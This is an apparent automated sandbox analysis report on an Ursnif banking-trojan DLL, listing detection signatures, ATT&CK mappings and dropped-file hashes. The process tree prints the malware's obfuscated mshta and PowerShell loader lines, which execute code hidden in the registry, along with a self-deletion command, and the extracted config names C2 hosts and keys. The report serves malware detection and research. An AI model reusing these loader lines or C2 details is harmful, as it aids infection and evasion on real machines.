Windows
Analysis Report
626a961800203.rar
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
- loaddll32.exe (PID: 6352 cmdline: loaddll32.exe "C:\Users\user\Desktop\626a961800203.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6368 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a961800203.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 6388 cmdline: rundll32.exe "C:\Users\user\Desktop\626a961800203.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 2300 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- rundll32.exe (PID: 1408 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
- mshta.exe (PID: 6228 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qbwe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qbwe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name elhthuju -value gp; new-alias -name fwiwawp -value iex; fwiwawp ([System.Text.Encoding]::ASCII.GetString((elhthuju "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6460 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\boqgffzj\boqgffzj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 488 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFF5.tmp" "c:\Users\user\AppData\Local\Temp\boqgffzj\CSC6A71A2D878D54201A284CABB415B85EF.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 3724 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yb3ge0m0\yb3ge0m0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 2980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0EC.tmp" "c:\Users\user\AppData\Local\Temp\yb3ge0m0\CSCCD644729527F4748ACD06F6743FBF148.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 3684 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a961800203.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 6784 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 1300 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\92B2.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Timestamp: | 04/28/22-15:36:09.408600 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:36:11.602821 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:35:48.541659 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:36:10.453628 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_05115FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_05FAFD47 |
Source: | Code function: | 2_2_05FA65C2 | |
Source: | Code function: | 2_2_05FA99BC | |
Source: | Code function: | 2_2_05FBBAD1 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | Code function: | 2_2_05111CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_05115FBB |
System Summary |
---|
Source: | Matched rule: |
Source: | WMI Registry write: | ||
Source: | Code function: | 2_2_05114BF1 | |
Source: | Code function: | 2_2_05111645 | |
Source: | Code function: | 2_2_0511829C | |
Source: | Code function: | 2_2_05FC3DB0 | |
Source: | Code function: | 2_2_05FB154D | |
Source: | Code function: | 2_2_05FBD7F1 | |
Source: | Code function: | 2_2_05FA67CA | |
Source: | Code function: | 2_2_05FBFF4D | |
Source: | Code function: | 2_2_05FAB238 |
Source: | Code function: | 2_2_05FB8E57 |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Code function: | 2_2_05116D0A | |
Source: | Code function: | 2_2_0511190C | |
Source: | Code function: | 2_2_05114321 | |
Source: | Code function: | 2_2_051184C1 | |
Source: | Code function: | 2_2_05FB6DE0 | |
Source: | Code function: | 2_2_05FA74AE | |
Source: | Code function: | 2_2_05FAC431 | |
Source: | Code function: | 2_2_05FB0782 | |
Source: | Code function: | 2_2_05FBBE80 | |
Source: | Code function: | 2_2_05FB61AE | |
Source: | Code function: | 2_2_05FB7950 | |
Source: | Code function: | 2_2_05FA710A | |
Source: | Code function: | 2_2_05FB00DC | |
Source: | Code function: | 2_2_05FBA806 | |
Source: | Code function: | 2_2_05FB2331 | |
Source: | Code function: | 2_2_05FB5312 | |
Source: | Code function: | 2_2_05FA64C4 | |
Source: | Code function: | 2_2_05FAB7D5 | |
Source: | Code function: | 2_2_05FAD77A | |
Source: | Code function: | 2_2_05FA36BB | |
Source: | Code function: | 2_2_05FA10C7 | |
Source: | Code function: | 2_2_05FB3829 | |
Source: | Code function: | 2_2_05FBEAC5 | |
Source: | Code function: | 2_2_05FB5220 |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Code function: | 2_2_051168BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0511829B | |
Source: | Code function: | 2_2_05117EA9 | |
Source: | Code function: | 2_2_05FC3DAF | |
Source: | Code function: | 2_2_05FA3496 | |
Source: | Code function: | 2_2_05FC38A9 |
Source: | Code function: | 2_2_05FAEC00 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_05FAFD47 |
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_05FA65C2 | |
Source: | Code function: | 2_2_05FA99BC | |
Source: | Code function: | 2_2_05FBBAD1 |
Source: | Code function: | 2_2_05FAEC00 |
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 2_2_05FA8FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 2_2_05113365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_05114B89 |
Source: | Code function: | 2_2_05113365 |
Source: | Code function: | 2_2_05FB81F1 |
Source: | Code function: | 2_2_05116D78 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.140.115.8 | unknown | Latvia | 43513 | NANO-ASLV | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 617373 |
Start date and time: | 2022-04-28 15:34:28 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 29s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 626a961800203.rar (renamed file extension from rar to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 43 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@28/17@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16, 23.35.236.56
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6228 because there are no executed function
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
15:35:44 | API Interceptor | |
15:36:22 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
94.140.115.8 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NANO-ASLV | Get hash | malicious | Browse |
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 4.004569426704533 |
Encrypted: | false |
SSDEEP: | 24:HRje9E2+f7vDfH9hhKdNWI+ycuZhNJakSXPNnq9qd:b7bdvKd41ulJa3Fq9K |
MD5: | E655BE880AD97ED626D857E71D386B60 |
SHA1: | A786C2FCC3E77FB2145825508B37B17466D1D905 |
SHA-256: | FB97FF6C91BB189C854D620ABE7E2CF2B6FB6154CD2A7A12E634E851915AD21B |
SHA-512: | 531132C345164EF991DC6623B44B705301FC5206BEFA785921CC2FAEC6B0ED677E9DB3DBAE3CCD45ADB2C191297743B3C2E205391BD39EEED2E1BA18C8F3271A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9717803542241024 |
Encrypted: | false |
SSDEEP: | 24:H1je9E2+fDPKDfHyhKdNWI+ycuZhNFakSjPNnq9qd:PDPQoKd41ulFa3Jq9K |
MD5: | 4E319196ACB86E99D9B97635AA802521 |
SHA1: | 2F551D90630396C3AC8481B591D8D630E9DC6870 |
SHA-256: | E1AF91236ECCB6BD0B2E31C4A26AF6010D88EAEBB22DAA99C407DDFA1B202FEA |
SHA-512: | 184D2762F261C46330C47D9F3C5CBB344C46613DE92F05C6E3E08E293CEE8F353C5D48FA38A570DEF5F1AE38F9B56EC1F35030243858DD05CEA144B8BA70785E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1106268299163986 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWpYak7YnqqrpNPN5Dlq5J:+RI+ycuZhNJakSXPNnqX |
MD5: | AC00C19757068F83CB50DFA6C5FB7255 |
